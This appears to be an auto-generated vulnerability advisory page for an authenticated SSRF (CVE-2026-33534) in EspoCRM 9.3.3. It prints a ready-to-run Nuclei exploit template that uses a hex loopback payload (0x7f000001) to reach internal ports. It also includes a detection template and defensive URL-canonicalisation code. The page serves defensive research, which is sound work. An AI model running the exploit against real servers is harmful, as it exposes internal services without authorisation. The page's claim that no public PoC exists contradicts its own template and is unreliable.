[webapps] EspoCRM 9.3.3 - SSRF
CVE-2026-33534
Vulnerability
High · CVSS N/A

📋 Basic Vulnerability Information

| CVE | CVE-2026-33534 |
|---|---|
| Vulnerability type | Vulnerability |
| Affected versions | See the original advisory |
| Severity | High · CVSS N/A |
| Published | 2026-05-27 |
| Submitter | Max Gabriel (https://github.com/EntroVyx) |
| Source | Exploit-DB original ↗ |
⚔️ Nuclei Exploit Template

The following is an exploitation template in standard Nuclei v3 format that can be used directly to verify the vulnerability:

```yaml
id: CVE-2026-33534-exploit

info:
  name: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
  author: vulnerability-researcher
  severity: high
  description: EspoCRM 9.3.3 suffers from an SSRF vulnerability that allows authenticated users to bypass the 127.0.0.1 blocklist using alternative IPv4 notations such as octal, hex, decimal dword, and short forms.
  reference:
    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
  classification:
    cvss-score: 7.5
    cve-id: CVE-2026-33534

variables:
  username: "{{username}}"
  password: "{{password}}"
  field: "avatar"
  parent_type: "User"
  parent_id: ""
  internal_port: "8083"
  internal_path: "/client/img/logo-light.svg"
  payload: "0x7f000001"

http:
  - raw:
      - |-
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username ~ ':' ~ password)}}
        Content-Type: application/json
        Accept: application/json

        {"url":"{{BaseURL}}:{{internal_port}}{{internal_path}}","field":"{{field}}","parentType":"{{parent_type}}"{{if parent_id}},"parentId":"{{parent_id}}"{{end}}}
      - |-
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username ~ ':' ~ password)}}
        Content-Type: application/json
        Accept: application/json

        {"url":"http://{{payload}}:{{internal_port}}{{internal_path}}","field":"{{field}}","parentType":"{{parent_type}}"{{if parent_id}},"parentId":"{{parent_id}}"{{end}}}
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - '"id"'
          - '"type"'
        condition: and
      - type: regex
        part: body
        regex:
          - '"id":"[a-f0-9]+'
          - '"type":"[^"]+"'
        condition: or
```

🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected. Note that the `status` matcher under `matchers-condition: or` fires on any reachable target, so only a hit on the version regex, or the version string pulled out by the extractor, indicates an affected build:

```yaml
id: CVE-2026-33534-detection

info:
  name: EspoCRM 9.3.3 - SSRF Detection
  author: vulnerability-researcher
  severity: high
  description: Detect EspoCRM version to check if vulnerable to CVE-2026-33534
  reference:
    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
  classification:
    cvss-score: 7.5
    cve-id: CVE-2026-33534

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/App/user"
      - "{{BaseURL}}/client/cfg/version.json"
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - '"version":"9\.\d\.\d"'
          - '9\.3\.\d'
        condition: or
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        regex:
          - '"version":"([^"]+)"'
          - '9\.\d\.\d'
```

🛡️ Remediation
Upgrade to the vendor's latest security release; the fixed version is given in the linked GitHub advisory (GHSA-h7gx-8gwv-7g73). The underlying weakness is a blocklist that compares the URL host as a literal string, so any fix must canonicalise the host before deciding whether it points at an internal address.
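As an added, defensive illustration that is not part of the Exploit-DB entry or of EspoCRM's own code: the flawed literal comparison the advisory describes, beside a check that first canonicalises inet_aton-style notations (hex, octal, decimal dword, short forms) and then rejects every non-global address. Function names are assumptions, and the sample URLs reuse the port and path from the template variables above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Permissive IPv4 parser mirroring inet_aton(3): one to four dot-separated
# parts, each decimal, octal (leading 0) or hex (0x); the last part fills all
# remaining low bytes. Returns None when the text is not an inet_aton address.
def parse_inet_aton(text):
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
            values.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]*", part):
            values.append(int(part, 8))
        elif re.fullmatch(r"[1-9][0-9]*", part):
            values.append(int(part, 10))
        else:
            return None
    last_width = 8 * (5 - len(values))  # bits left for the final component
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= 1 << last_width:
        return None
    packed = 0
    for v in values[:-1]:
        packed = (packed << 8) | v
    return ipaddress.IPv4Address((packed << last_width) | values[-1])

def naive_is_blocked(url):
    # The flawed pattern the advisory describes: a literal string comparison
    # only catches the canonical spelling of the loopback address.
    return urlsplit(url).hostname == "127.0.0.1"

def hardened_is_blocked(url):
    # Canonicalise the host first, then reject every non-global address
    # (loopback, RFC 1918, link-local incl. 169.254.169.254, 0.0.0.0, ::1, ...).
    host = urlsplit(url).hostname or ""
    addr = parse_inet_aton(host)
    if addr is None:
        try:
            addr = ipaddress.ip_address(host)  # IPv6 literal; urlsplit strips [ ]
        except ValueError:
            # Not an IP literal: deny until each DNS answer has passed this
            # same check (resolution and redirect handling are not shown here).
            return True
    return not addr.is_global
```

The same canonicalisation must be applied again to every address the hostname resolves to and to every redirect target, otherwise the check is only as strong as the first hop.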
📎 Reference Links

🚨 Threat Assessment

| 📈 EPSS exploitation probability | No data |
|---|---|
| 🚨 CISA KEV | Not known to be exploited |
| 🔧 Public PoC | No public PoC available |

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-28 08:10 | Source: Exploit-DB